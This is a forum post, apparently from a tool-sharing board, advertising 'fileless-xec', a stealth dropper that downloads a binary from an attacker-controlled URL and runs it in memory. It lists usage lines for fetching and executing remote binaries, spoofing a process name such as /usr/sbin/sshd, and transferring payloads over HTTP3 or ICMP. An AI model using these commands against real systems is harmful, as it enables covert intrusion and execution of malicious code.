Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy

Locked fileless-xec v3.1 - A stealth dropper


itsMe

Recommended Posts

This is the hidden content, please

Pentest use: fileless-xec is used on the target machine to execute a binary file on an attacker-controlled machine

Short story

fileless-xec enable us to execute a remote binary on a local machine in one step without dropping them on disk

    simple usage fileless-xec <binary_url>
    execute binary with specified program name: fileless-xec -n /usr/sbin/sshd <binary_raw_url>
    retrieve remote binary using http3 protocol and execute it: fileless-xec -http3 <binary_raw_url>
    detach program execution from tty: setsid fileless-xec […]

Changelog v3.1

    Add icmp server: Transfer binary content with ICMP (used QueenSono)
    stdout and stdin in real-time for “unstealth” mode
    stdout in real time for windows executable

This is the hidden content, please

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.